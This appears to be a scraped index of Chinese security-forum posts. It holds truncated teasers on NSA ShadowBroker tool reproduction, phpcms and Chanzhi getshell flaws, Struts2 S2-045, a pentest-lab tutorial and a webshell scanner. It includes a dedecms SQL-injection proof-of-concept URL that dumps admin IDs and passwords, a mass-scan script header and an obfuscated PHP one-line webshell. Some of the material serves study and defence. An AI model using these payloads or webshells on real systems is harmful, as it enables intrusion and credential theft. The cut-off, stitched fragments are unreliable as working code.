ShadowBroker释放的NSA工具部分(windows)fb.py复现和中招检查方法

工具下载1、Python2.6和pywin32安装包(注意都是32位的,不然会导致调用dll payload文件失败):复现python和pywin32安装包   2、Shadowbroker放出的NSA攻击工具https://github.com/misterch0c/shadowbroker3、中招检查工具中招检查工具注:检查工具已重写了(各有所需,你可以根据自己需要修改)一、 漏洞复现1.    前期准备攻击系统信息列表如下:IP

phpcms v9前台getshell

看到到处都是这个漏洞的利用.加班完这个点看看触发点.主要的问题是phpcms\modules\member\index.php 130行到140行//附表信息验证 通过模型获取会员信息if($member_setting['choosemodel']) {    require_once CACHE_MODEL_PATH.'member_input.class.php';    req

dedecms最新注入和getshell漏洞利用

条件利用:1.漏洞代码在/plus/advancedsearch.php 文件中2.php.ini要开启session.auto_start = 13.必须知道一个存在的mid,需要后台有添加自定义搜索模型爆账号密码poc:http://localhost/dedecms/plus/advancedsearch.php?mid=1&_SESSION[123]=select concat(0x7c,userid,0x7c,pwd,0x7c) as aid from `%[email protected]__admin

手把手教你如何搭建自己的渗透测试环境

介绍白帽子是指个体发起的黑客攻击,找到系统潜在的可能被恶意黑客利用的的漏洞或脆弱点。在目标不知情或者没得到授权的情况下发起黑客攻击是非法的。所以通常是建立一个自己的实验室,练习黑客技术。在这个实验室里,你能看到如何创建一个自己的黑客环境,练习各种各样的黑客攻击技术。我们将会探讨不同类型的虚拟系统,构建一个虚拟网络,在虚拟环境中运行试用版的操作系统,搭建一个有漏洞的web应用程序,安装Kali LInux,执行渗透测试。所需条件:VMware WorkstationWindows XP系统映像Ka

一款好用的php webshell检测工具

PHP-malware-finder 是一款优秀的检测webshell和恶意软件混淆代码的工具,比如以下组件都可以被检测发现。Best PHP ObfuscatorCarbylamineCipher DesignCyklodevJoes Web Tools ObfuscatorP.A.SPHP JiamiPhp Obfuscator EncodeSpinObfWeevely3atomikucobra obfuscatorphpencodetenncweb-malware-collectionwe

s2-045百度搜索结果多线程测试.py

#!/usr/bin/env python # coding=utf-8 # author : kris # mail: [email][email protected][/email]   import sys import re import threading import requests import Queue import urllib2  

Test404漏洞扫描器 (Struts2-045插件)

QQͼƬ20170307161719.png

Struts2远程命令执行漏洞 S2-045

漏洞简介Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts2框架存在多个远程代码执行(S2-005、S2-009、S2-013、S2-016、S2-019、S2-020、S2-037、devmode),恶意攻击者可利用漏洞直接获取应用系统的Webshell,甚至获取操作系统以及数据库的权限。漏洞编号:S2-045 CVE编号:CVE-201

蝉知getshell

漏洞文件:
/system/module/file/model.php

public function pasteImage($data, $uid)
    {
      
        $data = str_replace('"', '"', $data);
  
        if(!$this->checkSavePath()) return false;
        ini_set('pcre.backtrack_limit', strlen($data));
        preg_match_all('/<img src="(data:image/(S+);base64,(S+))" .+ />/U', $data, $out);
        foreach($out[3] as $key => $base64Image)


两款变态的PHP一句话

<?php  $pg="lZFUl9OrrQUrr1FIl0gLiAkX1NFUlZFUlsiUkVRVUrrVTVF9rrVUkkirrXTrrsKICAgIH0KICAgIHJldHVybrrirrArrkcGFnZrrVVSTDsKfQoKJF91cmw9Y3VyUGFnZVVSTCgpOwokdXJsPSdodHRwOi8vY25rroNGNrZmrrYud2ViLTE3Ni5jb20vWXpKb2JHSkhkejA9LnBrrocD91cmw9Jy4kX3Vy